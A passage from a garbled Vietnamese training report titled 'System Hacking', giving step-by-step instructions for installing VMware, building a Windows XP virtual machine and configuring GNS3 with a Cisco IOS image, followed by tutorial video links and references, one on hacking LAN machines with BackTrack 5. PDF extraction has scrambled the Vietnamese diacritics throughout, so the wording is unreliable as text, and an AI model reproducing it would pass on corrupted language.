– Typical: ch n n i sẽ cài đ t và ch n ọ ơ ặ ọ Next đ ti p t cể ế ụ
Huỳnh Minh Trí Page 42
System Hacking
– Custom: ch n các gói cài đ t thêm; n u ch n gói debug Eclipse thì ph iọ ặ ế ọ ả
ch n c 2 gói Java và C n u không ch ng trình sẽ báo l i -> Ch n ọ ả ế ươ ỗ ọ Next đ ti pể ế
t cụ
Huỳnh Minh Trí Page 43
System Hacking
L a ch n n i ch ng trình sẽ t o shortcut -> Ch n ự ọ ơ ươ ạ ọ Next
Ch n ọ Continue đ b t đ u cài đ tể ắ ầ ặ
Huỳnh Minh Trí Page 44
System Hacking
Quá trình cài đ t b t đ u … quá trình này có th kéo dài t 5′~10′ặ ắ ầ ể ừ
Huỳnh Minh Trí Page 45
System Hacking
Cài đ t hoàn t t ch ng trình sẽ yêu c u đăng ký b n quy n, Ch n ặ ấ ươ ầ ả ề ọ Next
ho c các b n có th b qua b c này b ng cách Ch n ặ ạ ể ỏ ướ ằ ọ Skip
K t thúc quá trình VMW7 sẽ yêu c u kh i đ ng l i máy tính. Có th kô c nế ầ ở ộ ạ ể ầ
kh i đ ng l i mà v n có th kh i đ ng đ c ch ng trìnhở ộ ạ ẫ ể ở ộ ượ ươ
Huỳnh Minh Trí Page 46
System Hacking
Trong l n kh i đ ng đ u tiên VMW sẽ mu n b n xác nh n l i là có mu n ầ ở ộ ầ ố ạ ậ ạ ố
s d ng ch ng trình hay kô! N u có ch n ử ụ ươ ế ọ Yes -> Ch n ọ OK đ xác nh nể ậ
Đây là giao di n làm vi c chính c a ch ng trìnhệ ệ ủ ươ
Huỳnh Minh Trí Page 47
System Hacking
2. Cài đ t máy o b ng VMware:ặ ả ằ
Sau khi t i v và cài đ t trên máy tính b n kh i đ ng ch ng trìnhả ề ặ ạ ở ộ ươ
VMware b ng cách ch n đúp vào bi u t ng ngoài màn hình Desktop, và làmằ ọ ể ượ
theo các b c sau:ướ
T màn hình chính b n ch n ừ ạ ọ Menu File > New > Virtual Machine… ho cặ
Ctrl+ N
Huỳnh Minh Trí Page 48
System Hacking
Ch n ọ Next
B n ch n ạ ọ Typical đ cài m c đ nh sau đó Ch n ể ặ ị ọ Next
Huỳnh Minh Trí Page 49
System Hacking
Ph n m m h tr cho b n r t nhi u h đi u hành t Windows đ n Linuxầ ề ỗ ợ ạ ấ ề ệ ề ừ ế
ho c Sun Solaris... B n ch n h đi u hành và phiên b n r i Ch n ặ ạ ọ ệ ề ả ồ ọ Next để
ti p t cế ụ
đây tôi ch n cài h đi u hành Windows XP 64 bít, b n cũng có th thay Ở ọ ệ ề ạ ể
đ i th m c l u tr t i ổ ư ụ ư ữ ạ Location, r i Ch n ồ ọ Next đ ti p t cể ế ụ
Huỳnh Minh Trí Page 50
System Hacking
T i đây b n nên ch n ạ ạ ọ Use Brided Networking đ c i đ t cho Card m ngể ả ặ ạ
c a mình và Ch n ủ ọ Next đ ti p t cể ế ụ
T i đây b n có th thay đ i giá tr c a c ng trên máy o (M c đ nh là 8Gb) vàạ ạ ể ổ ị ủ ổ ứ ả ặ ị
Huỳnh Minh Trí Page 51
System Hacking
Ch n ọ Finish đ k t thúc quá trình l a ch n c u hình máy o.ể ế ự ọ ấ ả
Nh v y là quá trình l a ch n c u hình máy o k t thúcư ậ ự ọ ấ ả ế
Huỳnh Minh Trí Page 52
System Hacking
B n cũng có th thay đ i các thông s nh dung l ng RAM, d ng l ngạ ể ổ ố ư ượ ươ ượ
c ng ngay t i đây.ổ ứ ạ
Đ thi t l p CD-ROM cho máy o ph c v cho cài đ t h đi u hành b nể ế ậ ổ ả ụ ụ ặ ệ ề ạ
Ch n đúp vào ọ ổ CD-ROM.
– N u b n mu n cài t đĩa CD/DVD thì b n tích ch n ế ạ ố ừ ạ ọ User phisical
Driver và ch nọ Auto Detect
– N u mu n cài t file ISO có trong máy b n tích ch n ế ố ừ ạ ọ Use ISO image và
tìm đ n file ISO trên máy c a b nế ủ ạ
Huỳnh Minh Trí Page 53
System Hacking
Sau khi hoàn t t, đ cài máy o b n Ch n ấ ể ả ạ ọ "Start this Vitual Machine"
Và b n th c hi n cài bình th ng nh cài cho máy th t.ạ ự ệ ườ ư ậ
3. Cài đ t GNS3:ặ
GNS3 có th ch y trên Windows,Linux và Mac OSX.Đ cài đ t ph n m mể ạ ể ặ ầ ề
trên Window d dàng chúng ta có th s d ng b cài đ t all-in-one cung c pễ ể ử ụ ộ ặ ấ
m i th b n c n đ ch y đ c GNS3.ọ ứ ạ ầ ể ạ ượ
Các b n ch n file GNS3.exe trong ph n th y giáo g i.ạ ọ ầ ầ ử
Ti n hành cài đ tế ặ
Huỳnh Minh Trí Page 54
System Hacking
Huỳnh Minh Trí Page 55
System Hacking
Huỳnh Minh Trí Page 56
System Hacking
Huỳnh Minh Trí Page 57
System Hacking
Giao di n GNS3 sau khi cài đ t xongệ ặ
3. C u hình cho GNS3:ấ
Vào Edit > Add IOS images and hypervisors ch đ ng d n đ n các file IOSỉ ườ ẫ ế
trong m c Settingụ
Huỳnh Minh Trí Page 58
System Hacking
Các b n vào ph n Image file: vào ch n đ ng d n t i ph n tài li u c aạ ầ ọ ườ ẫ ớ ầ ệ ủ
th y giáo g i có đính kèm file :c2691-adventerprisek9-mz.124-25c.binầ ử
Huỳnh Minh Trí Page 59
System Hacking
Sau khi ch n đ ng d n xong các b n nh n Save.ọ ườ ẫ ạ ấ
Vào Edit > Preferences > Dynamips > Trong m c Excutable Path ch nụ ọ
đ ng d n đ n t p tin dynamip-wxp.exe trong th m c cài đ t GNS3 , sau đóườ ẫ ế ậ ư ụ ặ
b m vào nút Test đ ki m tra l i ho t đ ng c a Dynamip.ấ ể ể ạ ạ ộ ủ
Huỳnh Minh Trí Page 60
System Hacking
Huỳnh Minh Trí Page 61
System Hacking
Nh n ok.ấ
Kéo th các router đã có IOS vào đ tri n khai 1 mô hình đ n gi n.ả ể ể ơ ả
Huỳnh Minh Trí Page 62
System Hacking
CÁC CLIP H NG D NƯỚ Ẫ
https://www.youtube.com/watch?v=V_l_JNnH2GU&list=UUc8-uuS3IRvbEk1EOjrVYEQ
https://www.youtube.com/watch?v=wU-l1dO5ZqE&index=2&list=UUc8-uuS3IRvbEk1EOjrVYEQ
https://www.youtube.com/watch?v=fasOuWKRnx0&list=UUc8-uuS3IRvbEk1EOjrVYEQ&index=9
https://www.youtube.com/watch?v=fQ5qC4E11Do&list=UUc8-uuS3IRvbEk1EOjrVYEQ
https://www.youtube.com/watch?v=5liS6E1ge90&list=UUc8-uuS3IRvbEk1EOjrVYEQ&index=2
https://www.youtube.com/watch?v=INkaadmMras&list=UUc8-uuS3IRvbEk1EOjrVYEQ&index=3
https://www.youtube.com/watch?v=6ADhFh7f0h8&index=4&list=UUc8-uuS3IRvbEk1EOjrVYEQ
Huỳnh Minh Trí Page 63
System Hacking
DANH M C TÀI LI U THAM KH OỤ Ệ Ả
http://suamaytinhtainha.info/thu-thuat-may-tinh/cach-hack-may-tinh-trong-mang-lan-bang-backtrack-5.html
https://www.mediafire.com/folder/laq7hirml1w5g/Athena-TaiLieu
http://athena.edu.vn/video/an-ninh-mang
Huỳnh Minh Trí Page 64